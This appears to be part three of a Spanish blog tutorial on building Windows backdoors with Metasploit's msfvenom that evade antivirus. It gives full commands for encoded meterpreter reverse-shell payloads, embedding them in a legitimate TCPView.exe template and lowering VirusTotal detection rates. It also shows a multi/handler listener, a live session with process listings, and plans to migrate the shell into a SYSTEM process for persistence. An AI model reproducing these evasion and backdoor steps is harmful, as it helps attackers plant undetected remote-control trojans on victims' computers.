Ya en la segunda entrega, se trabajo con el comando msfencode para aplicar técnicas de evasión de IDS/IPS/AV a un PAYLOAD determinado, el objetivo es conseguir un ejecutable para windows con el menor número de detecciones posible en virustotal.

Si recordáis, en los ejemplos propuestos en el artículo anterior, con msfencode, no se logró reducir el número de detecciones, siendo nuestro ejecutable (backdoor4.exe) detectado por la gran mayoría de los sistema de Antivirus, en el artículo de hoy, se va a generar un ejecutable utilizando msfvenom y veremos como facilita las cosas en el nuevo comando con respecto a los anteriores.

INDICE: Parte 1 | Parte 2 | Parte 3

Ejemplos de USO (tercera parte)

Ante de comenzar conviene recordar en que consiste el comando msfvenom. Es un comando que unifica msfpayload y msfencode en uno solo, mayor rapidez y facilidad de uso. Además de incluir la capacidad de introducir NOPS al ejecutable generado, proporcionando otra forma más en el intento de evitar ser detectado por el sistema antivirus.

Ejemplo 3:

Vamos a comenzar por el principio, puesto que el comando msfvenom unifica el PAYLOAD y las técnicas de ENCODING bajo uno solo.

>> Paso 1: La elección del PAYLOAD

En la segunda parte, ya empezamos a intuir que la elección del PAYLOAD es fundamental para evitar ser detectado, tanto o incluso más aún que la técnica de ofuscación del código que utilicemos, pues la detección heurística de los sistema antivirus enfatiza su detección en la carga (payload). Bueno dejemos de lado, la filosofía del funcionamiento de los antivirus para centrarnos en el artículo.

root@ST2Labs > msfvenom --list payloads

msfvenom --list payloads [Listar los payloads disponibles]

>> Paso 2: Configuración de los parámetros de PAYLOAD

Para ver que parámetros de configuración son necesarios para el PAYLOAD escogido (windows/meterpreter/reverse_ord_tcp), se ejecuta lo siguiente:

root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -o

msfvenom -o [ Ver las opciones de configuración del payload]

La elección del PAYLOAD (windows/meterpreter/reverse_ord_tcp) incluye la conexión inversa del tipo ORD, para generar un PAYLOAD con toda la funcionalidad de meterpreter con un menor tamaño, que nos ayude en nuestra tarea de evadir al Antivirus.

Llego el momento, ahora que tenemos el PAYLOAD, se va generar el fichero ejecutable con un sólo comando:

>> Paso 3: Generación del ejecutable (EXE)

En esta ocasión he decidido cambiar el nombre del archivo generado por p.exe, en el ejemplo veréis que voy por la prueba número seis, es decir p6.exe, las anteriores pruebas han sido probando con otros PAYLOAD y el resultado ha sido similar, por lo que no he creído interesante incluirlo en el artículo.

root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe LHOST=192.168.2.105 > p6.exe

msfvenom [Generación de EXE con encoding x86/shikata_ga_nai]

Como se puede observar en la imagen superior, se ha utilizado el encoding x86/shikata_ga_nai con la restricción del uso de los caracteres '\x00\x20\x0a\x0d', y el PAYLOAD comentado en las líneas anteriores.

El resultado de virustotal es:

Análisis de virustotal.com

¿Qué esta pasando? Parece que los motores de antivirus tienen identificado al PAYLOAD meterpreter generado por metasploit, a pasar de incluir la ofuscación polimórfica. Pero ¿esta todo perdido?

>> Paso 4: Utilización de template (EXE)

El template tomar como modelo en la generación la estructura de otro ejecutable no malicioso para la generación del ejecutable (EXE) final. Para este ejemplo utilizare el programa TCPview.exe.

root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe -x Tcpview.exe LHOST=192.168.2.105 > tcpviewmod.exe

Parece apropiado nombrar en esta ocasión al fichero como tcpviewmod.exe, lo subimos a virustotal y:

Análisis virustotal para PAYLOAD con template tcpview.exe

¡¡ Tachán !! Acabamos de reducir considerablemente la capacidad de detección de nuestro ejecutable, sin embargo, los principales motores de antivirus siguen detectando nuestro ejecutable.

Se empieza a intuir que la utilización del template nos ha ayudado, ha creado un ejecutable con una estructura similar al TCPview.exe, y ha funcionado, ¿significa esto que la efectividad de la evasión rádica en la estructura que genera el ejecutable? o ¿la capacidad de generar un ejecutable que no se parezca en nada a un ejecutable con payload meterpreter por defecto? La respuesta es ambas cosas, de ahí que se utilicen las técnicas de ofuscación (encoding).

>> Paso 5: Utilización del formato exe-small, generación de un ejecutable diferente al normal y/o por defecto.

Sin template: TCPview.exe
Opción_ exe-small
Nombre: tcpviewmod2.exe (simplmente para guardar relación con el paso 4)

root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 20 -f exe-small LHOST=192.168.2.105 > tcpviewmod2.exe

Lo subimos a VirusTotal:

Análisis virustotal para PAYLOAD con generación exe-small.

¡¡ Tachán !! ¡¡ Tachán !! ¡¡ Tachán !!
Acabamos de generar un ejecutable que es detectado por tan solo el 26% de los motores de antivirus, aquí se incluyen algunos como por ejemplo (TrendMicro / Symantec):

O Karpesky y Windows Defender (Microsoft), ver imagen siguiente:

Os invito a vosotros a realizar vuestras propias pruebas, por supuesto:
El contenido de este artículo es meramente informativo y/o con fines educativos, no me hago responsable del uso que de él se pueda hacer.

Sin embargo, por algún motivo que por el momento no he sido capaz de desenmascarar el ejecutable generado tcpviewmod2.exe con exe-small (~5Kbytes) no funciona correctamente ;(

Generando un EXE para las pruebas
Template: Tcpview.exe
Payload: windows/meterpreter/reverse_tcp
Creación nuevo hilo sobre el template= true
Encoding: x86/shikata_ga_nai
Restricción de caracteres= yes (\x00\x20\x0a\x0d)

root@ST2Labs > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00\x20\x0a\x0d' -i 10 -f exe LHOST=192.168.2.105 LPORT=80 > tcpviewRmod80.exe

Resultados VT (virustotal) 28/45 (62%) | Principales motores de antivirus lo detectan correctamente, con la salvedad de TrendMicro puede comprobarse usando el siguiente hash || SHA256: 8bfb89a906540d8f553914c88f8db5102224e0be8064093e8617e845f4d4a528

>> Paso 6: Probando el funcionamiento de tcpviewRmod80.exe

Para finalizar el artículo y confirmar la utilidad de los ejemplos anteriores voy a mostrar que hay varias formas de gestionar la conexión del backdoor que se ha generado en el ejecutable, la primera sería utilizando la consola de comandos de #Metasploit, y configurando el exploit/multi/handler para nuestro menester.

O la segunda, más apropiado para el este caso, es utilizar el comando msfcli, nos permite interactuar en la línea de comandos de Linux con el framework de metasploit llegando al mismo fin , pero con menos comandos, veamos con un ejemplo:

Configuración de #Metasploit para gestionar la conexión inversa de Meterpreter, utilizando para ello MSFCLI.

root@ST2Labs > msfcli -h

msfcli -h [Muestra el menú de ayuda]

root@ST2Labs > msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.2.105 LPORT=80 EnableContextEncoding=true E

Recordamos el escenario:

Se ejecuta tcpviewRmod80.exe en el Windows, y se obtiene una sesión de meterpreter, finalizando a sí nuestro objetivo.

Ejecución de tcpviewRmod80.exe

Se puede ver en la imagen siguiente, como la consola de Metasploit, recibe una conexión al puerto 80, y se crea una sesión meterpreter con la victima.

msfcli [Metasploit server meterpreter]

Nota: Al utilizarse Tcpview.exe como ejecutable y ser utilizado para cargar meterpreter en un hilo del mismo, meterpreter se esta ejecutando con el PID (el proceso tcpviewRmod80.exe), ahora podríamos usar migrate para mover meterpreter a otro proceso más estable. De esa forma, si el usuario cierra el programa tcpviewRmod80.exe meterpreter seguirá ejecutándose en el sistema.

>> Paso 7: Migrando meterpreter a un proceso más estable con privilegios SYSTEM

Comando ejecutados en la consola de "meterpreter" para llevar la migración del proceso meterpreter.

meterpreter > sysinfo

Computer : MNT_USER

OS : Windows XP (Build 2600, Service Pack 3).

Architecture : x86

System Language : es_ES

Meterpreter : x86/win32

meterpreter > getpid

Current pid: 120

meterpreter > ps

Process List

============

PID PPID Name Arch Session User Path

--- ---- ---- ---- ------- ---- ----

0 0 [System Process] 4294967295

4 0 System x86 0

120 1576 tcpviewRmod80.exe x86 0 MNT_USER\admin C:\Intercambio documentos\tcpviewRmod80.exe

240 700 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe

568 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe

632 568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe

656 568 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe

700 656 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe

712 656 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe

780 700 alg.exe x86 0 C:\WINDOWS\System32\alg.exe

880 700 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\VMware\VMware Tools\vmacthlp.exe

904 700 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

1008 1576 notepad.exe x86 0 MNT_USER\admin C:\WINDOWS\system32\NOTEPAD.EXE

1012 700 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

1084 1100 wscntfy.exe x86 0 MNT_USER\admin C:\WINDOWS\system32\wscntfy.exe

1100 700 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1156 700 wmiapsrv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiapsrv.exe

1188 700 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

1272 700 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

1328 1576 reverse_tcp_sin_encoding_p13.exe x86 0 MNT_USER\admin C:\Intercambio documentos\reverse_tcp_sin_encoding_p13.exe

1404 700 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe

1576 1548 explorer.exe x86 0 MNT_USER\admin C:\WINDOWS\Explorer.EXE

1644 1576 jusched.exe x86 0 MNT_USER\admin C:\Archivos de programa\Java\jre6\bin\jusched.exe

1672 1576 vmtoolsd.exe x86 0 MNT_USER\admin C:\Archivos de programa\VMware\VMware Tools\vmtoolsd.exe

1680 1576 ctfmon.exe x86 0 MNT_USER\admin C:\WINDOWS\system32\ctfmon.exe

1824 700 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

1912 700 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\Java\jre6\bin\jqs.exe

2000 700 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe

meterpreter > getuid

Server username: MNT_USER\admin